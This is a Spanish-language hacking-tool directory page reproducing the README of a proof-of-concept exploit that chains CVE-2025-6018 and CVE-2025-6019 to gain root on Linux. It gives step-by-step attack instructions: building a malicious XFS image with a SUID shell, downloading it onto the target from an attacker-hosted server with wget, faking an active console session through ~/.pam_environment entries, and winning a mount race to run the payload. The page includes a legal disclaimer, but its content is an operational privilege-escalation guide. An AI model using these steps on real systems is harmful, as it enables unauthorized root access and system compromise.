Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/michaelventurella/cve-2025-6018-6019-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmichaelventurella/cve-2025-6018-6019-poc

CVE-2025-6018-6019-PoC

Una Prueba de Concepto para el encadenamiento de CVE-2025-6018 (Bypass de Sesión Activa en PAM/Polkit) y CVE-2025-6019 (Fallo de Montaje SUID en libblockdev) para lograr Escalada Local de Privilegios (LPE) en sistemas Linux vulnerables.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1726hace 7 mesesAún no revisado

CVE-2025-6018 y CVE-2025-6019: PoC de Escalada de Privilegios Local

Un robusto Proof of Concept (PoC) para encadenar CVE-2025-6018 (bypass de sesión activa de PAM/Polkit) y CVE-2025-6019 (fallo de montaje SUID en libblockdev) para lograr acceso root en sistemas Linux vulnerables.

Aviso legal

Esta herramienta es solo para fines educativos e investigación de seguridad autorizada. No la use en sistemas que no posea o para los que no tenga permiso explícito para probar.


La Cadena de Vulnerabilidades

Este exploit encadena dos fallos lógicos para escalar privilegios de un usuario estándar a root:

  1. CVE-2025-6018 (La Entrada): Una mala configuración en PAM/Polkit permite que las sesiones SSH remotas sean marcadas como Active=yes. Esto engaña al sistema haciéndole creer que el usuario remoto está físicamente presente en la consola, omitiendo los requisitos de contraseña para herramientas de gestión de hardware como udisks2.
  2. CVE-2025-6019 (El Arma): La biblioteca libblockdev (usada por udisks2) no aplica el indicador de seguridad nosuid al montar temporalmente un sistema de archivos para operaciones de mantenimiento (como Check o Resize).

La Cadena de Ataque

  1. Preparación: Creamos una imagen XFS maliciosa que contiene un shell root SUID estático.
  2. Bypass: Confiamos en el estado de sesión Active=yes para montar esta imagen como un dispositivo de bucle sin contraseña.
  3. Disparador: Realizamos una llamada D-Bus a Filesystem.Check. Esto obliga a udisks2 a montar temporalmente la imagen para verificarla. Crucialmente, este montaje temporal carece de nosuid.
  4. Condición de Carrera: Un programa C compilado ("The Sniper") monitorea /proc/mounts en tiempo real. En el momento en que aparece el montaje temporal, ejecuta el payload SUID antes de que el sistema lo desmonte.

Uso

Fase 1: Preparación (Máquina Atacante)

Dado que la máquina objetivo a menudo carece de herramientas como mkfs.xfs o gcc, generamos el payload localmente.

  1. Ejecute el script de compilación en Kali/Parrot:

    ./build_poc.sh
    
    • Crea exploit.img (imagen XFS de 400MB con shell SUID).
    • Compila catcher (El ganador de la condición de carrera).
  2. Sube los archivos al objetivo: Inicia un servidor Python:

    python3 -m http.server 80
    

    En la máquina objetivo (por ejemplo, en /tmp):

    wget http://<YOUR_IP>/exploit.img
    wget http://<YOUR_IP>/catcher
    chmod +x catcher
    

Fase 2: Explotación (Máquina Objetivo)

  1. Descargue el script de exploit: Guarde el contenido de exploit.sh de este repositorio en la máquina objetivo.

  2. Ejecute el exploit:

    chmod +x exploit.sh
    ./exploit.sh
    
  3. Disfrute de Root: El script configurará automáticamente el dispositivo de bucle, iniciará el catcher en segundo plano y disparará la vulnerabilidad. Debería obtener un shell root de inmediato.


Solución de Problemas

"Se requiere autenticación para configurar un dispositivo de bucle"

Si el script solicita una contraseña, su sesión SSH no está activa. Solución:

  1. Cree ~/.pam_environment:
    echo "XDG_SEAT=seat0" > ~/.pam_environment
    echo "XDG_VTNR=1" >> ~/.pam_environment
    
  2. Cierre sesión y vuelva a iniciarla.
  3. Verifique con loginctl show-session $XDG_SESSION_ID | grep Active. Debe decir Active=yes.

"Fallo de condición de carrera / Sin shell"

La ventana vulnerable tiene solo milisegundos de ancho.

  • Asegúrese de estar usando el catcher compilado en C (incluido en build_poc.sh), no un bucle Bash.
  • El script usa el método Filesystem.Check, que es más confiable que Resize.

Manifiesto de Archivos

build_poc.sh (Lado del Atacante)

Automatiza la creación de la imagen maliciosa y compila los binarios estáticos.

exploit.sh (Lado del Objetivo)

El orquestador. Se encarga de:

  1. Verificar la sesión activa.
  2. Iniciar el catcher en segundo plano.
  3. Configurar el dispositivo de bucle mediante udisksctl.
  4. Disparar la llamada D-Bus Filesystem.Check.

Créditos

  • Descubrimiento Original: Qualys Research Team (CVE-2025-6018, CVE-2025-6019) https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/
Descargar herramienta